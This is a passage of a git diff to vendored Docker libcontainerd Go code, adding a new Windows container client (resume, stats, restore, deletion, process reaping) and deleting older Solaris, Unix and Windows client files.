Resume(_ context.Context, containerID string) error { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return err + } + + if ctr.ociSpec.Windows.HyperV == nil { + return errors.New("cannot resume Windows Server Containers") + } + + ctr.Lock() + defer ctr.Unlock() + + if err = ctr.hcsContainer.Resume(); err != nil { + return err + } + + ctr.status = StatusRunning + + c.eventQ.append(containerID, func() { + err := c.backend.ProcessEvent(containerID, EventResumed, EventInfo{ + ContainerID: containerID, + ProcessID: InitProcessName, + }) + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventResumed, + }).Info("sending event") + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": containerID, + "event": EventResumed, + }).Error("failed to process event") + } + }) + + return nil +} + +// Stats handles stats requests for containers +func (c *client) Stats(_ context.Context, containerID string) (*Stats, error) { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + readAt := time.Now() + s, err := ctr.hcsContainer.Statistics() + if err != nil { + return nil, err + } + return &Stats{ + Read: readAt, + HCSStats: &s, + }, nil +} + +// Restore is the handler for restoring a container +func (c *client) Restore(ctx context.Context, id string, attachStdio StdioCallback) (bool, int, error) { + c.logger.WithField("container", id).Debug("restore()") + + // TODO Windows: On RS1, a re-attach isn't possible. + // However, there is a scenario in which there is an issue. + // Consider a background container. The daemon dies unexpectedly. + // HCS will still have the compute service alive and running. + // For consistence, we call in to shoot it regardless if HCS knows about it + // We explicitly just log a warning if the terminate fails. + // Then we tell the backend the container exited. + if hc, err := hcsshim.OpenContainer(id); err == nil { + const terminateTimeout = time.Minute * 2 + err := hc.Terminate() + + if hcsshim.IsPending(err) { + err = hc.WaitTimeout(terminateTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + c.logger.WithField("container", id).WithError(err).Debug("terminate failed on restore") + return false, -1, err + } + } + return false, -1, nil +} + +// GetPidsForContainer returns a list of process IDs running in a container. +// Not used on Windows. +func (c *client) ListPids(_ context.Context, _ string) ([]uint32, error) { + return nil, errors.New("not implemented on Windows") +} + +// Summary returns a summary of the processes running in a container. +// This is present in Windows to support docker top. In linux, the +// engine shells out to ps to get process information. On Windows, as +// the containers could be Hyper-V containers, they would not be +// visible on the container host. However, libcontainerd does have +// that information. +func (c *client) Summary(_ context.Context, containerID string) ([]Summary, error) { + ctr, _, err := c.getProcess(containerID, InitProcessName) + if err != nil { + return nil, err + } + + p, err := ctr.hcsContainer.ProcessList() + if err != nil { + return nil, err + } + + pl := make([]Summary, len(p)) + for i := range p { + pl[i] = Summary(p[i]) + } + return pl, nil +} + +func (c *client) DeleteTask(ctx context.Context, containerID string) (uint32, time.Time, error) { + ec := -1 + ctr := c.getContainer(containerID) + if ctr == nil { + return uint32(ec), time.Now(), errors.WithStack(newNotFoundError("no such container")) + } + + select { + case <-ctx.Done(): + return uint32(ec), time.Now(), errors.WithStack(ctx.Err()) + case <-ctr.waitCh: + default: + return uint32(ec), time.Now(), errors.New("container is not stopped") + } + + ctr.Lock() + defer ctr.Unlock() + return ctr.exitCode, ctr.exitedAt, nil +} + +func (c *client) Delete(_ context.Context, containerID string) error { + c.Lock() + defer c.Unlock() + ctr := c.containers[containerID] + if ctr == nil { + return errors.WithStack(newNotFoundError("no such container")) + } + + ctr.Lock() + defer ctr.Unlock() + + switch ctr.status { + case StatusCreated: + if err := c.shutdownContainer(ctr); err != nil { + return err + } + fallthrough + case StatusStopped: + delete(c.containers, containerID) + return nil + } + + return errors.WithStack(newInvalidParameterError("container is not stopped")) +} + +func (c *client) Status(ctx context.Context, containerID string) (Status, error) { + c.Lock() + defer c.Unlock() + ctr := c.containers[containerID] + if ctr == nil { + return StatusUnknown, errors.WithStack(newNotFoundError("no such container")) + } + + ctr.Lock() + defer ctr.Unlock() + return ctr.status, nil +} + +func (c *client) UpdateResources(ctx context.Context, containerID string, resources *Resources) error { + // Updating resource isn't supported on Windows + // but we should return nil for enabling updating container + return nil +} + +func (c *client) CreateCheckpoint(ctx context.Context, containerID, checkpointDir string, exit bool) error { + return errors.New("Windows: Containers do not support checkpoints") +} + +func (c *client) getContainer(id string) *container { + c.Lock() + ctr := c.containers[id] + c.Unlock() + + return ctr +} + +func (c *client) getProcess(containerID, processID string) (*container, *process, error) { + ctr := c.getContainer(containerID) + switch { + case ctr == nil: + return nil, nil, errors.WithStack(newNotFoundError("no such container")) + case ctr.init == nil: + return nil, nil, errors.WithStack(newNotFoundError("container is not running")) + case processID == InitProcessName: + return ctr, ctr.init, nil + default: + ctr.Lock() + defer ctr.Unlock() + if ctr.execs == nil { + return nil, nil, errors.WithStack(newNotFoundError("no execs")) + } + } + + p := ctr.execs[processID] + if p == nil { + return nil, nil, errors.WithStack(newNotFoundError("no such exec")) + } + + return ctr, p, nil +} + +func (c *client) shutdownContainer(ctr *container) error { + const shutdownTimeout = time.Minute * 5 + err := ctr.hcsContainer.Shutdown() + + if hcsshim.IsPending(err) { + err = ctr.hcsContainer.WaitTimeout(shutdownTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + c.logger.WithError(err).WithField("container", ctr.id). + Debug("failed to shutdown container, terminating it") + terminateErr := c.terminateContainer(ctr) + if terminateErr != nil { + c.logger.WithError(terminateErr).WithField("container", ctr.id). + Error("failed to shutdown container, and subsequent terminate also failed") + return fmt.Errorf("%s: subsequent terminate failed %s", err, terminateErr) + } + return err + } + + return nil +} + +func (c *client) terminateContainer(ctr *container) error { + const terminateTimeout = time.Minute * 5 + err := ctr.hcsContainer.Terminate() + + if hcsshim.IsPending(err) { + err = ctr.hcsContainer.WaitTimeout(terminateTimeout) + } else if hcsshim.IsAlreadyStopped(err) { + err = nil + } + + if err != nil { + c.logger.WithError(err).WithField("container", ctr.id). + Debug("failed to terminate container") + return err + } + + return nil +} + +func (c *client) reapProcess(ctr *container, p *process) int { + logger := c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "process": p.id, + }) + + var eventErr error + + // Block indefinitely for the process to exit. + if err := p.hcsProcess.Wait(); err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != windows.ERROR_BROKEN_PIPE { + logger.WithError(err).Warnf("Wait() failed (container may have been killed)") + } + // Fall through here, do not return. This ensures we attempt to + // continue the shutdown in HCS and tell the docker engine that the + // process/container has exited to avoid a container being dropped on + // the floor. + } + exitedAt := time.Now() + + exitCode, err := p.hcsProcess.ExitCode() + if err != nil { + if herr, ok := err.(*hcsshim.ProcessError); ok && herr.Err != windows.ERROR_BROKEN_PIPE { + logger.WithError(err).Warnf("unable to get exit code for process") + } + // Since we got an error retrieving the exit code, make sure that the + // code we return doesn't incorrectly indicate success. + exitCode = -1 + + // Fall through here, do not return. This ensures we attempt to + // continue the shutdown in HCS and tell the docker engine that the + // process/container has exited to avoid a container being dropped on + // the floor. + } + + if err := p.hcsProcess.Close(); err != nil { + logger.WithError(err).Warnf("failed to cleanup hcs process resources") + exitCode = -1 + eventErr = fmt.Errorf("hcsProcess.Close() failed %s", err) + } + + if p.id == InitProcessName { + // Update container status + ctr.Lock() + ctr.status = StatusStopped + ctr.exitedAt = exitedAt + ctr.exitCode = uint32(exitCode) + close(ctr.waitCh) + ctr.Unlock() + + if err := c.shutdownContainer(ctr); err != nil { + exitCode = -1 + logger.WithError(err).Warn("failed to shutdown container") + thisErr := fmt.Errorf("failed to shutdown container: %s", err) + if eventErr != nil { + eventErr = fmt.Errorf("%s: %s", eventErr, thisErr) + } else { + eventErr = thisErr + } + } else { + logger.Debug("completed container shutdown") + } + + if err := ctr.hcsContainer.Close(); err != nil { + exitCode = -1 + logger.WithError(err).Error("failed to clean hcs container resources") + thisErr := fmt.Errorf("failed to terminate container: %s", err) + if eventErr != nil { + eventErr = fmt.Errorf("%s: %s", eventErr, thisErr) + } else { + eventErr = thisErr + } + } + } + + c.eventQ.append(ctr.id, func() { + ei := EventInfo{ + ContainerID: ctr.id, + ProcessID: p.id, + Pid: uint32(p.pid), + ExitCode: uint32(exitCode), + ExitedAt: exitedAt, + Error: eventErr, + } + c.logger.WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExit, + "event-info": ei, + }).Info("sending event") + err := c.backend.ProcessEvent(ctr.id, EventExit, ei) + if err != nil { + c.logger.WithError(err).WithFields(logrus.Fields{ + "container": ctr.id, + "event": EventExit, + "event-info": ei, + }).Error("failed to process event") + } + if p.id != InitProcessName { + ctr.Lock() + delete(ctr.execs, p.id) + ctr.Unlock() + } + }) + + return exitCode +} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go b/vendor/github.com/docker/docker/libcontainerd/client_solaris.go deleted file mode 100644 index cb939975f8..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_solaris.go +++ /dev/null @@ -1,101 +0,0 @@ -package libcontainerd - -import "golang.org/x/net/context" - -type client struct { - clientCommon - - // Platform specific properties below here. - remote *remote - q queue - exitNotifiers map[string]*exitNotifier - liveRestore bool -} - -// GetServerVersion returns the connected server version information -func (clnt *client) GetServerVersion(ctx context.Context) (*ServerVersion, error) { - resp, err := clnt.remote.apiClient.GetServerVersion(ctx, &containerd.GetServerVersionRequest{}) - if err != nil { - return nil, err - } - - sv := &ServerVersion{ - GetServerVersionResponse: *resp, - } - - return sv, nil -} - -func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, specp Process, attachStdio StdioCallback) (int, error) { - return -1, nil -} - -func (clnt *client) SignalProcess(containerID string, pid string, sig int) error { - return nil -} - -func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { - return nil -} - -func (clnt *client) Pause(containerID string) error { - return nil -} - -func (clnt *client) Resume(containerID string) error { - return nil -} - -func (clnt *client) Stats(containerID string) (*Stats, error) { - return nil, nil -} - -func (clnt *client) getExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.RLock() - defer clnt.mapMutex.RUnlock() - return clnt.exitNotifiers[containerID] -} - -func (clnt *client) getOrCreateExitNotifier(containerID string) *exitNotifier { - clnt.mapMutex.Lock() - defer clnt.mapMutex.Unlock() - w, ok := clnt.exitNotifiers[containerID] - if !ok { - w = &exitNotifier{c: make(chan struct{}), client: clnt} - clnt.exitNotifiers[containerID] = w - } - return w -} - -// Restore is the handler for restoring a container -func (clnt *client) Restore(containerID string, attachStdio StdioCallback, options ...CreateOption) error { - return nil -} - -func (clnt *client) GetPidsForContainer(containerID string) ([]int, error) { - return nil, nil -} - -// Summary returns a summary of the processes running in a container. -func (clnt *client) Summary(containerID string) ([]Summary, error) { - return nil, nil -} - -// UpdateResources updates resources for a running container. -func (clnt *client) UpdateResources(containerID string, resources Resources) error { - // Updating resource isn't supported on Solaris - // but we should return nil for enabling updating container - return nil -} - -func (clnt *client) CreateCheckpoint(containerID string, checkpointID string, checkpointDir string, exit bool) error { - return nil -} - -func (clnt *client) DeleteCheckpoint(containerID string, checkpointID string, checkpointDir string) error { - return nil -} - -func (clnt *client) ListCheckpoints(containerID string, checkpointDir string) (*Checkpoints, error) { - return nil, nil -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_unix.go b/vendor/github.com/docker/docker/libcontainerd/client_unix.go deleted file mode 100644 index 21e8fea666..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_unix.go +++ /dev/null @@ -1,142 +0,0 @@ -// +build linux solaris - -package libcontainerd - -import ( - "encoding/json" - "fmt" - "os" - "path/filepath" - "strings" - "sync" - - "github.com/Sirupsen/logrus" - containerd "github.com/docker/containerd/api/grpc/types" - "github.com/docker/docker/pkg/idtools" - specs "github.com/opencontainers/runtime-spec/specs-go" - "golang.org/x/net/context" -) - -func (clnt *client) prepareBundleDir(uid, gid int) (string, error) { - root, err := filepath.Abs(clnt.remote.stateDir) - if err != nil { - return "", err - } - if uid == 0 && gid == 0 { - return root, nil - } - p := string(filepath.Separator) - for _, d := range strings.Split(root, string(filepath.Separator))[1:] { - p = filepath.Join(p, d) - fi, err := os.Stat(p) - if err != nil && !os.IsNotExist(err) { - return "", err - } - if os.IsNotExist(err) || fi.Mode()&1 == 0 { - p = fmt.Sprintf("%s.%d.%d", p, uid, gid) - if err := idtools.MkdirAs(p, 0700, uid, gid); err != nil && !os.IsExist(err) { - return "", err - } - } - } - return p, nil -} - -func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) (err error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - - if _, err := clnt.getContainer(containerID); err == nil { - return fmt.Errorf("Container %s is already active", containerID) - } - - uid, gid, err := getRootIDs(specs.Spec(spec)) - if err != nil { - return err - } - dir, err := clnt.prepareBundleDir(uid, gid) - if err != nil { - return err - } - - container := clnt.newContainer(filepath.Join(dir, containerID), options...) - if err := container.clean(); err != nil { - return err - } - - defer func() { - if err != nil { - container.clean() - clnt.deleteContainer(containerID) - } - }() - - if err := idtools.MkdirAllAs(container.dir, 0700, uid, gid); err != nil && !os.IsExist(err) { - return err - } - - f, err := os.Create(filepath.Join(container.dir, configFilename)) - if err != nil { - return err - } - defer f.Close() - if err := json.NewEncoder(f).Encode(spec); err != nil { - return err - } - - return container.start(checkpoint, checkpointDir, attachStdio) -} - -func (clnt *client) Signal(containerID string, sig int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - _, err := clnt.remote.apiClient.Signal(context.Background(), &containerd.SignalRequest{ - Id: containerID, - Pid: InitFriendlyName, - Signal: uint32(sig), - }) - return err -} - -func (clnt *client) newContainer(dir string, options ...CreateOption) *container { - container := &container{ - containerCommon: containerCommon{ - process: process{ - dir: dir, - processCommon: processCommon{ - containerID: filepath.Base(dir), - client: clnt, - friendlyName: InitFriendlyName, - }, - }, - processes: make(map[string]*process), - }, - } - for _, option := range options { - if err := option.Apply(container); err != nil { - logrus.Errorf("libcontainerd: newContainer(): %v", err) - } - } - return container -} - -type exitNotifier struct { - id string - client *client - c chan struct{} - once sync.Once -} - -func (en *exitNotifier) close() { - en.once.Do(func() { - close(en.c) - en.client.mapMutex.Lock() - if en == en.client.exitNotifiers[en.id] { - delete(en.client.exitNotifiers, en.id) - } - en.client.mapMutex.Unlock() - }) -} -func (en *exitNotifier) wait() <-chan struct{} { - return en.c -} diff --git a/vendor/github.com/docker/docker/libcontainerd/client_windows.go b/vendor/github.com/docker/docker/libcontainerd/client_windows.go deleted file mode 100644 index ddcf321c85..0000000000 --- a/vendor/github.com/docker/docker/libcontainerd/client_windows.go +++ /dev/null @@ -1,631 +0,0 @@ -package libcontainerd - -import ( - "errors" - "fmt" - "io" - "io/ioutil" - "os" - "path/filepath" - "strings" - "syscall" - - "golang.org/x/net/context" - - "github.com/Microsoft/hcsshim" - "github.com/Sirupsen/logrus" - "github.com/docker/docker/pkg/sysinfo" - "github.com/opencontainers/runtime-spec/specs-go" -) - -type client struct { - clientCommon - - // Platform specific properties below here (none presently on Windows) -} - -// Win32 error codes that are used for various workarounds -// These really should be ALL_CAPS to match golangs syscall library and standard -// Win32 error conventions, but golint insists on CamelCase. -const ( - CoEClassstring = syscall.Errno(0x800401F3) // Invalid class string - ErrorNoNetwork = syscall.Errno(1222) // The network is not present or not started - ErrorBadPathname = syscall.Errno(161) // The specified path is invalid - ErrorInvalidObject = syscall.Errno(0x800710D8) // The object identifier does not represent a valid object -) - -// defaultOwner is a tag passed to HCS to allow it to differentiate between -// container creator management stacks. We hard code "docker" in the case -// of docker. -const defaultOwner = "docker" - -// Create is the entrypoint to create a container from a spec, and if successfully -// created, start it too. Table below shows the fields required for HCS JSON calling parameters, -// where if not populated, is omitted. -// +-----------------+--------------------------------------------+---------------------------------------------------+ -// | | Isolation=Process | Isolation=Hyper-V | -// +-----------------+--------------------------------------------+---------------------------------------------------+ -// | VolumePath | \\?\\Volume{GUIDa} | | -// | LayerFolderPath | %root%\windowsfilter\containerID | %root%\windowsfilter\containerID (servicing only) | -// | Layers[] | ID=GUIDb;Path=%root%\windowsfilter\layerID | ID=GUIDb;Path=%root%\windowsfilter\layerID | -// | SandboxPath | | %root%\windowsfilter | -// | HvRuntime | | ImagePath=%root%\BaseLayerID\UtilityVM | -// +-----------------+--------------------------------------------+---------------------------------------------------+ -// -// Isolation=Process example: -// -// { -// "SystemType": "Container", -// "Name": "5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", -// "Owner": "docker", -// "IsDummy": false, -// "VolumePath": "\\\\\\\\?\\\\Volume{66d1ef4c-7a00-11e6-8948-00155ddbef9d}", -// "IgnoreFlushesDuringBoot": true, -// "LayerFolderPath": "C:\\\\control\\\\windowsfilter\\\\5e0055c814a6005b8e57ac59f9a522066e0af12b48b3c26a9416e23907698776", -// "Layers": [{ -// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", -// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" -// }], -// "HostName": "5e0055c814a6", -// "MappedDirectories": [], -// "HvPartition": false, -// "EndpointList": ["eef2649d-bb17-4d53-9937-295a8efe6f2c"], -// "Servicing": false -//} -// -// Isolation=Hyper-V example: -// -//{ -// "SystemType": "Container", -// "Name": "475c2c58933b72687a88a441e7e0ca4bd72d76413c5f9d5031fee83b98f6045d", -// "Owner": "docker", -// "IsDummy": false, -// "IgnoreFlushesDuringBoot": true, -// "Layers": [{ -// "ID": "18955d65-d45a-557b-bf1c-49d6dfefc526", -// "Path": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c" -// }], -// "HostName": "475c2c58933b", -// "MappedDirectories": [], -// "SandboxPath": "C:\\\\control\\\\windowsfilter", -// "HvPartition": true, -// "EndpointList": ["e1bb1e61-d56f-405e-b75d-fd520cefa0cb"], -// "HvRuntime": { -// "ImagePath": "C:\\\\control\\\\windowsfilter\\\\65bf96e5760a09edf1790cb229e2dfb2dbd0fcdc0bf7451bae099106bfbfea0c\\\\UtilityVM" -// }, -// "Servicing": false -//} -func (clnt *client) Create(containerID string, checkpoint string, checkpointDir string, spec specs.Spec, attachStdio StdioCallback, options ...CreateOption) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - logrus.Debugln("libcontainerd: client.Create() with spec", spec) - - configuration := &hcsshim.ContainerConfig{ - SystemType: "Container", - Name: containerID, - Owner: defaultOwner, - IgnoreFlushesDuringBoot: false, - HostName: spec.Hostname, - HvPartition: false, - } - - if spec.Windows.Resources != nil { - if spec.Windows.Resources.CPU != nil { - if spec.Windows.Resources.CPU.Count != nil { - // This check is being done here rather than in adaptContainerSettings - // because we don't want to update the HostConfig in case this container - // is moved to a host with more CPUs than this one. - cpuCount := *spec.Windows.Resources.CPU.Count - hostCPUCount := uint64(sysinfo.NumCPU()) - if cpuCount > hostCPUCount { - logrus.Warnf("Changing requested CPUCount of %d to current number of processors, %d", cpuCount, hostCPUCount) - cpuCount = hostCPUCount - } - configuration.ProcessorCount = uint32(cpuCount) - } - if spec.Windows.Resources.CPU.Shares != nil { - configuration.ProcessorWeight = uint64(*spec.Windows.Resources.CPU.Shares) - } - if spec.Windows.Resources.CPU.Percent != nil { - configuration.ProcessorMaximum = int64(*spec.Windows.Resources.CPU.Percent) * 100 // ProcessorMaximum is a value between 1 and 10000 - } - } - if spec.Windows.Resources.Memory != nil { - if spec.Windows.Resources.Memory.Limit != nil { - configuration.MemoryMaximumInMB = int64(*spec.Windows.Resources.Memory.Limit) / 1024 / 1024 - } - } - if spec.Windows.Resources.Storage != nil { - if spec.Windows.Resources.Storage.Bps != nil { - configuration.StorageBandwidthMaximum = *spec.Windows.Resources.Storage.Bps - } - if spec.Windows.Resources.Storage.Iops != nil { - configuration.StorageIOPSMaximum = *spec.Windows.Resources.Storage.Iops - } - } - } - - var layerOpt *LayerOption - for _, option := range options { - if s, ok := option.(*ServicingOption); ok { - configuration.Servicing = s.IsServicing - continue - } - if f, ok := option.(*FlushOption); ok { - configuration.IgnoreFlushesDuringBoot = f.IgnoreFlushesDuringBoot - continue - } - if h, ok := option.(*HyperVIsolationOption); ok { - configuration.HvPartition = h.IsHyperV - configuration.SandboxPath = h.SandboxPath - continue - } - if l, ok := option.(*LayerOption); ok { - layerOpt = l - } - if n, ok := option.(*NetworkEndpointsOption); ok { - configuration.EndpointList = n.Endpoints - configuration.AllowUnqualifiedDNSQuery = n.AllowUnqualifiedDNSQuery - continue - } - if c, ok := option.(*CredentialsOption); ok { - configuration.Credentials = c.Credentials - continue - } - } - - // We must have a layer option with at least one path - if layerOpt == nil || layerOpt.LayerPaths == nil { - return fmt.Errorf("no layer option or paths were supplied to the runtime") - } - - if configuration.HvPartition { - // Find the upper-most utility VM image, since the utility VM does not - // use layering in RS1. - // TODO @swernli/jhowardmsft at some point post RS1 this may be re-locatable. - var uvmImagePath string - for _, path := range layerOpt.LayerPaths { - fullPath := filepath.Join(path, "UtilityVM") - _, err := os.Stat(fullPath) - if err == nil { - uvmImagePath = fullPath - break - } - if !os.IsNotExist(err) { - return err - } - } - if uvmImagePath == "" { - return errors.New("utility VM image could not be found") - } - configuration.HvRuntime = &hcsshim.HvRuntime{ImagePath: uvmImagePath} - } else { - configuration.VolumePath = spec.Root.Path - } - - configuration.LayerFolderPath = layerOpt.LayerFolderPath - - for _, layerPath := range layerOpt.LayerPaths { - _, filename := filepath.Split(layerPath) - g, err := hcsshim.NameToGuid(filename) - if err != nil { - return err - } - configuration.Layers = append(configuration.Layers, hcsshim.Layer{ - ID: g.ToString(), - Path: layerPath, - }) - } - - // Add the mounts (volumes, bind mounts etc) to the structure - mds := make([]hcsshim.MappedDir, len(spec.Mounts)) - for i, mount := range spec.Mounts { - mds[i] = hcsshim.MappedDir{ - HostPath: mount.Source, - ContainerPath: mount.Destination, - ReadOnly: false, - } - for _, o := range mount.Options { - if strings.ToLower(o) == "ro" { - mds[i].ReadOnly = true - } - } - } - configuration.MappedDirectories = mds - - hcsContainer, err := hcsshim.CreateContainer(containerID, configuration) - if err != nil { - return err - } - - // Construct a container object for calling start on it. - container := &container{ - containerCommon: containerCommon{ - process: process{ - processCommon: processCommon{ - containerID: containerID, - client: clnt, - friendlyName: InitFriendlyName, - }, - commandLine: strings.Join(spec.Process.Args, " "), - }, - processes: make(map[string]*process), - }, - ociSpec: spec, - hcsContainer: hcsContainer, - } - - container.options = options - for _, option := range options { - if err := option.Apply(container); err != nil { - logrus.Errorf("libcontainerd: %v", err) - } - } - - // Call start, and if it fails, delete the container from our - // internal structure, start will keep HCS in sync by deleting the - // container there. - logrus.Debugf("libcontainerd: Create() id=%s, Calling start()", containerID) - if err := container.start(attachStdio); err != nil { - clnt.deleteContainer(containerID) - return err - } - - logrus.Debugf("libcontainerd: Create() id=%s completed successfully", containerID) - return nil - -} - -// AddProcess is the handler for adding a process to an already running -// container. It's called through docker exec. It returns the system pid of the -// exec'd process. -func (clnt *client) AddProcess(ctx context.Context, containerID, processFriendlyName string, procToAdd Process, attachStdio StdioCallback) (int, error) { - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return -1, err - } - // Note we always tell HCS to - // create stdout as it's required regardless of '-i' or '-t' options, so that - // docker can always grab the output through logs. We also tell HCS to always - // create stdin, even if it's not used - it will be closed shortly. Stderr - // is only created if it we're not -t. - createProcessParms := hcsshim.ProcessConfig{ - EmulateConsole: procToAdd.Terminal, - CreateStdInPipe: true, - CreateStdOutPipe: true, - CreateStdErrPipe: !procToAdd.Terminal, - } - createProcessParms.ConsoleSize[0] = uint(procToAdd.ConsoleSize.Height) - createProcessParms.ConsoleSize[1] = uint(procToAdd.ConsoleSize.Width) - - // Take working directory from the process to add if it is defined, - // otherwise take from the first process. - if procToAdd.Cwd != "" { - createProcessParms.WorkingDirectory = procToAdd.Cwd - } else { - createProcessParms.WorkingDirectory = container.ociSpec.Process.Cwd - } - - // Configure the environment for the process - createProcessParms.Environment = setupEnvironmentVariables(procToAdd.Env) - createProcessParms.CommandLine = strings.Join(procToAdd.Args, " ") - createProcessParms.User = procToAdd.User.Username - - logrus.Debugf("libcontainerd: commandLine: %s", createProcessParms.CommandLine) - - // Start the command running in the container. - var stdout, stderr io.ReadCloser - var stdin io.WriteCloser - newProcess, err := container.hcsContainer.CreateProcess(&createProcessParms) - if err != nil { - logrus.Errorf("libcontainerd: AddProcess(%s) CreateProcess() failed %s", containerID, err) - return -1, err - } - - pid := newProcess.Pid() - - stdin, stdout, stderr, err = newProcess.Stdio() - if err != nil { - logrus.Errorf("libcontainerd: %s getting std pipes failed %s", containerID, err) - return -1, err - } - - iopipe := &IOPipe{Terminal: procToAdd.Terminal} - iopipe.Stdin = createStdInCloser(stdin, newProcess) - - // Convert io.ReadClosers to io.Readers - if stdout != nil { - iopipe.Stdout = ioutil.NopCloser(&autoClosingReader{ReadCloser: stdout}) - } - if stderr != nil { - iopipe.Stderr = ioutil.NopCloser(&autoClosingReader{ReadCloser: stderr}) - } - - proc := &process{ - processCommon: processCommon{ - containerID: containerID, - friendlyName: processFriendlyName, - client: clnt, - systemPid: uint32(pid), - }, - commandLine: createProcessParms.CommandLine, - hcsProcess: newProcess, - } - - // Add the process to the container's list of processes - container.processes[processFriendlyName] = proc - - // Tell the engine to attach streams back to the client - if err := attachStdio(*iopipe); err != nil { - return -1, err - } - - // Spin up a go routine waiting for exit to handle cleanup - go container.waitExit(proc, false) - - return pid, nil -} - -// Signal handles `docker stop` on Windows. While Linux has support for -// the full range of signals, signals aren't really implemented on Windows. -// We fake supporting regular stop and -9 to force kill. -func (clnt *client) Signal(containerID string, sig int) error { - var ( - cont *container - err error - ) - - // Get the container as we need it to get the container handle. - clnt.lock(containerID) - defer clnt.unlock(containerID) - if cont, err = clnt.getContainer(containerID); err != nil { - return err - } - - cont.manualStopRequested = true - - logrus.Debugf("libcontainerd: Signal() containerID=%s sig=%d pid=%d", containerID, sig, cont.systemPid) - - if syscall.Signal(sig) == syscall.SIGKILL { - // Terminate the compute system - if err := cont.hcsContainer.Terminate(); err != nil { - if !hcsshim.IsPending(err) { - logrus.Errorf("libcontainerd: failed to terminate %s - %q", containerID, err) - } - } - } else { - // Terminate Process - if err := cont.hcsProcess.Kill(); err != nil && !hcsshim.IsAlreadyStopped(err) { - // ignore errors - logrus.Warnf("libcontainerd: failed to terminate pid %d in %s: %q", cont.systemPid, containerID, err) - } - } - - return nil -} - -// While Linux has support for the full range of signals, signals aren't really implemented on Windows. -// We try to terminate the specified process whatever signal is requested. -func (clnt *client) SignalProcess(containerID string, processFriendlyName string, sig int) error { - clnt.lock(containerID) - defer clnt.unlock(containerID) - cont, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - for _, p := range cont.processes { - if p.friendlyName == processFriendlyName { - return p.hcsProcess.Kill() - } - } - - return fmt.Errorf("SignalProcess could not find process %s in %s", processFriendlyName, containerID) -} - -// Resize handles a CLI event to resize an interactive docker run or docker exec -// window. -func (clnt *client) Resize(containerID, processFriendlyName string, width, height int) error { - // Get the libcontainerd container object - clnt.lock(containerID) - defer clnt.unlock(containerID) - cont, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - h, w := uint16(height), uint16(width) - - if processFriendlyName == InitFriendlyName { - logrus.Debugln("libcontainerd: resizing systemPID in", containerID, cont.process.systemPid) - return cont.process.hcsProcess.ResizeConsole(w, h) - } - - for _, p := range cont.processes { - if p.friendlyName == processFriendlyName { - logrus.Debugln("libcontainerd: resizing exec'd process", containerID, p.systemPid) - return p.hcsProcess.ResizeConsole(w, h) - } - } - - return fmt.Errorf("Resize could not find containerID %s to resize", containerID) - -} - -// Pause handles pause requests for containers -func (clnt *client) Pause(containerID string) error { - unlockContainer := true - // Get the libcontainerd container object - clnt.lock(containerID) - defer func() { - if unlockContainer { - clnt.unlock(containerID) - } - }() - container, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - for _, option := range container.options { - if h, ok := option.(*HyperVIsolationOption); ok { - if !h.IsHyperV { - return errors.New("cannot pause Windows Server Containers") - } - break - } - } - - err = container.hcsContainer.Pause() - if err != nil { - return err - } - - // Unlock container before calling back into the daemon - unlockContainer = false - clnt.unlock(containerID) - - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StatePause, - }}) -} - -// Resume handles resume requests for containers -func (clnt *client) Resume(containerID string) error { - unlockContainer := true - // Get the libcontainerd container object - clnt.lock(containerID) - defer func() { - if unlockContainer { - clnt.unlock(containerID) - } - }() - container, err := clnt.getContainer(containerID) - if err != nil { - return err - } - - // This should never happen, since Windows Server Containers cannot be paused - for _, option := range container.options { - if h, ok := option.(*HyperVIsolationOption); ok { - if !h.IsHyperV { - return errors.New("cannot resume Windows Server Containers") - } - break - } - } - - err = container.hcsContainer.Resume() - if err != nil { - return err - } - - // Unlock container before calling back into the daemon - unlockContainer = false - clnt.unlock(containerID) - - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateResume, - }}) -} - -// Stats handles stats requests for containers -func (clnt *client) Stats(containerID string) (*Stats, error) { - // Get the libcontainerd container object - clnt.lock(containerID) - defer clnt.unlock(containerID) - container, err := clnt.getContainer(containerID) - if err != nil { - return nil, err - } - s, err := container.hcsContainer.Statistics() - if err != nil { - return nil, err - } - st := Stats(s) - return &st, nil -} - -// Restore is the handler for restoring a container -func (clnt *client) Restore(containerID string, _ StdioCallback, unusedOnWindows ...CreateOption) error { - // TODO Windows: Implement this. For now, just tell the backend the container exited. - logrus.Debugf("libcontainerd: Restore(%s)", containerID) - return clnt.backend.StateChanged(containerID, StateInfo{ - CommonStateInfo: CommonStateInfo{ - State: StateExit, - ExitCode: 1 << 31, - }}) -} - 